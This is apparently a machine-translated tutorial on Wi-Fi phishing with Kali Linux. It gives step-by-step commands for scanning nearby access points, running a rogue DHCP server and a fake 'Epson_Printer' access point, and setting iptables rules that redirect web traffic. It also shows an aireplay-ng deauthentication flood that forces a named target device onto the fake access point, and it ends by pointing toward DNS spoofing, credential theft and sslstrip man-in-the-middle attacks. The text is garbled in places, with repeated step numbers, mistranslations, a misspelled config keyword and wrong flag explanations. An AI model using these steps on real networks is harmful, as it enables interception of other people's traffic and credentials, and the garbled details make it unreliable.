Technology sharing-getting started with WIFI phishing

Technology sharing-getting started with WIFI phishing
Introduction

This experiment first sets up a test environment, then creates a false Wireless Access Point, connects the network to a false access point, and forces the user to connect to a false wireless point.

Prerequisites

1. Wireless Network Adapter: the wireless network adapter is used for Packet sniffing and injection.

2. Backtrack or Kali Linux: Attack Platform

3. Wireless Network: ensure that the wireless network is used by the user and can control the wireless access point.

4. A target machine: This machine can be your physical machine or virtual machine. This experiment uses a Windows 7 virtual machine.

Start experiment: Create a rogue access point Step 1:

Start the VM and select kali linux. Click "Edit virtual machine settings" to go to the "Network Adapter" option and select "Bridged" in the Network connection )":

 

 

Step 2:

Enable logon with the root account of kali.

Step 3:

Connect the wireless network card of the notebook. Make sure there is a blue check box before the wireless Nic option under the Removable Devices option. If no, you need to select a wireless network card to disconnect the wireless network card from the Windows system and connect to the kali linux virtual machine, as shown in:

 

 

 

Step 4:

Open the terminal and enter the following command to check the IP address and gateway.

 

 

In this example, the gateway is 192.168.0.1

Step 5:

First, use the following command to list all NICs, such:

You can see a network card named wlan5.

 

 

Step 6:

Check whether all wireless APS nearby the user are available. Run the following command:

airodump-ng wlan5

After this command, data packets are captured and the access points near the user are listed. The BSSID is the MAC address of the Wireless AP, and the Channel represents the frequency. Note that the value of the PWR column is smaller than the value of the vro that is closer to it.

 

 

 

Step 7:

Write down the BSSID and Channel values of AP points. Note the MAC address of the target device.

In this example, the BISSID value is 5E: F9: 6A: 29: 28: 18, and the Channel value is 2. The MAC address of the target machine is 68: 5D: 43: 7D: F7: E9.

Step 8:

We must create a false DHCP server to provide a false AP access point. Run the following command in kali to create a DHCP:

apt-get install isc-dhcp-server

After setting up, modify the DHCP configuration file as follows:

leafpad /etc/dhcpd.conf

authoraitative;default-lease-time 600;max-lease-time 7200;subnet 192.168.1.0 netmask 255.255.255.0 {option routers 192.168.1.1;option subnet-mask 255.255.255.0;option domain-name “Epson_Printer”;option domain-name-servers 192.168.1.1;range 192.168.1.2 192.168.1.40;}

Save and close the configuration file.

Repeat the preceding operations on the/etc/dhcpd. conf file.

Step 9:

Open the terminal and execute the following command to create an AP access point with the ESSID name similar to the access AP of the victim. In this example, we use "Epson_Printer ".

airbase-ng –e Epson_Printer -c 2 wlan5

L e is the ESSID (MAC address) of the AP access point)

L c is the frequency of the wireless network

L Wlan5 is the NIC name

Now, a new AP Access Point named "Epson_Printer" is created.

 

Step 10:

Now, open a new terminal, start monitoring the phishing AP, and execute the following command:

airodump-ng –bssid 00:C0:CA:70:8F:25 -C 2 wlan 5 

 

Step 2:

Check the window generated in step 5. The newly created AP access point should be visible:

 

 

Step 2:

Now, we must provide the false Wireless AP to the network. Open the terminal and enter the following commands in sequence:

·  ifconfig at0 192.168.1.1 netmask 255.255.255.0·  ifconfig at0 mtu 1400·  route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1·  iptables –flush·  iptables –table nat –flush·  iptables –delete-chain·  iptables –table nat –delete-chain·  echo 1 > /proc/sys/net/ipv4/ip_forward·  iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.0.1(gateway)·  iptables -P FORWARD ACCEPT·  iptables –append FORWARD –in-interface at0 -j ACCEPT·  iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE·  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000·  dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0·  /etc/init.d/isc-dhcp-server start

 

 

 

Step 2:

We can wait for others to connect to this fake Wireless AP, or use the de-authenticate attack to force our target to reconnect to the AP, so that we can capture packets.

Run the following command:

aireplay-ng –deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5

5E: F9: 6A: 29: 28: 18 is the MAC address of the Wireless AP.

0 indicates de-authentication.

-C is the MAC address of the target machine.

Wlan5 is a network card

The following shows that the wireless network adapter is sending the de-authentication packet to the target Wireless AP. The target machine is disconnected from the "Epson_Printer" connection point and tries to reconnect, for example:

 

 

Step 2:

Due to the continuous sending of the deauth package, the client has been unable to connect to the original Wireless AP, So we began to try to connect to the other strongest Wireless AP, and our false AP signal was very strong, so we started to connect. For example:

 

 

Step 2:

View the airodump-ng command window. You can view the connected devices in the terminal:

 

 

Now the victim's device is connected to our fake Wireless AP. From here on, attackers can perform various means, such as using DNS to trick users into connecting to a fake website, Obtaining user authentication information, or using sslstrip and ettercap for man-in-the-middle attacks.